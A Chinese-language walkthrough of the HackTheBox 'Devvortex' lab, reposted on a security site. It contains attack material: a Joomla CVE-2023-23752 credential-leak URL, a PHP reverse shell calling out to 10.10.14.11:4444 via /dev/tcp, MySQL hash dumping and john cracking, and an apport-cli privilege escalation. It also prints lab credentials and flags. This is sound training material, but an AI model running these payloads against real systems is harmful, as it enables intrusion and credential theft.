【渗透测试】HackTheBox靶场之Devvortex

admin 2024年3月8日15:39:44评论17 views字数 1908阅读6分21秒阅读模式
点击蓝字
【渗透测试】HackTheBox靶场之Devvortex
关注我们

【渗透测试】HackTheBox靶场之Devvortex

【渗透测试】HackTheBox靶场之Devvortex
【渗透测试】HackTheBox靶场之Devvortex
微信搜一搜
【渗透测试】HackTheBox靶场之Devvortex
暗魂攻防实验室

0x01 信息收集

已知IP为:10.10.11.242

【渗透测试】HackTheBox靶场之Devvortex

使用nmap进行端口扫描,时间充足情况下可以使用-p-参数进行全端口扫描

nmap -sS -T4 10.10.11.242

【渗透测试】HackTheBox靶场之Devvortex

发现只有22和80web端口存活,浏览器访问IP自动跳转域名,老样子加hosts

【渗透测试】HackTheBox靶场之Devvortex

0x02 WEB渗透

访问网页,随便点点,看起来是一个静态网页

【渗透测试】HackTheBox靶场之Devvortex

我们直接扫描一下目录

dirsearch -u http://devvortex.htbdirb http://devvortex.htb

两个工具都好像没有扫描到什么

【渗透测试】HackTheBox靶场之Devvortex

换个思路去查下源代码,然后好像也没发现啥。。。按照红队思维,突然想到可以试着爆破一下子域名看看有没有什么东西,在kali下爆破子域名可以用gobuster或者subfinder,在暗魂渗透系统可以使用OneForAll

gobuster vhost -u devvortex.htb --append-domain -w /usr/share/wordlists/dirb/others/names.txt//vhost扫描模式用于查找目标网站上查找隐藏主机(因为靶场处于内网和手动解析的情况下),dns扫描模式是dns协议下发现相关子域名,然后--append-domain参数是附加主机名子域
动解析的情况下),dns扫描模式是dns协议下发现相关子域名,然后--append-domain参数是附加主机名子域

【渗透测试】HackTheBox靶场之Devvortex

扫描后发现隐藏主机:Dev.devvortex.htb,加上hosts后访问,也是一个静态网页

【渗透测试】HackTheBox靶场之Devvortex

再次扫描目录,看起来挺多东西的

【渗透测试】HackTheBox靶场之Devvortex

访问administrator目录,发现是个joomla框架

【渗透测试】HackTheBox靶场之Devvortex

百度搜了一下CVE,发现最新有个CVE-2023-23752未授权访问漏洞,使用poc

http://dev.devvortex.htb/api/index.php/v1/config/application?public=true

然后发现了用户名lewis和密码P4ntherg0t1n5r3c0n##

【渗透测试】HackTheBox靶场之Devvortex

成功登录后台

【渗透测试】HackTheBox靶场之Devvortex

在后台随便点点,找到了一个模板页面,可以直接修改成webshell。做这些靶场最好还是用反弹shell形式,用日常渗透这些webshell用冰蝎连,到最后还是要拿shell好执行命令。

  <?phpexec("/bin/bash -c 'sh -i >& /dev/tcp/10.10.14.11/4444 0>&1'");  ?>  访问:http://dev.devvortex.htb/administrator/templates/atum/error.php

【渗透测试】HackTheBox靶场之Devvortex

然后提升交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

找到user的flag在logan用户目录下,访问没权限。估计要找下logan用户的密码了

【渗透测试】HackTheBox靶场之Devvortex

可以翻翻数据库,账号就是上面找到的

【渗透测试】HackTheBox靶场之Devvortex

show databases; //查找数据库use joomla; //进入数据库joomlashow tables; //查找有哪些表select * from sd4fg_users; //找到用户表sd4fg_users后查所有数据

【渗透测试】HackTheBox靶场之Devvortex

数据库中找到用户名为logan的数据,然后可以看到密码哈希值

$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

可以使用john进行破解,爆破密码得:tequieromucho

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

【渗透测试】HackTheBox靶场之Devvortex

切换用户logan查看user.txt获得flag:

32dce103190f013b492d5704581ac1c7

【渗透测试】HackTheBox靶场之Devvortex

0x03 权限提升

sudo -l查看特权文件,发现有个apport-cli

【渗透测试】HackTheBox靶场之Devvortex

github找到有个CVE-2023-1326的apport-cli提权漏洞:

https://github.com/diego-tella/CVE-2023-1326-PoC

不过这个poc好像不能直接操作?

ps:反弹shell中操作命令有点不方便,我这里把他用ssh直接登录logan

【渗透测试】HackTheBox靶场之Devvortex

看描述中,好像-c指定报告后需要用less?

【渗透测试】HackTheBox靶场之Devvortex

sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash less输入V!/bin/bash

【渗透测试】HackTheBox靶场之Devvortex

找到root的flag:

d4698e95910d76632e5a64807cbcd101

【渗透测试】HackTheBox靶场之Devvortex

完结撒花!

【渗透测试】HackTheBox靶场之Devvortex

【渗透测试】HackTheBox靶场之Devvortex

原文始发于微信公众号(暗魂攻防实验室):【渗透测试】HackTheBox靶场之Devvortex

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月8日15:39:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透测试】HackTheBox靶场之Devvortexhttps://cn-sec.com/archives/2559452.html

发表评论

匿名网友 填写信息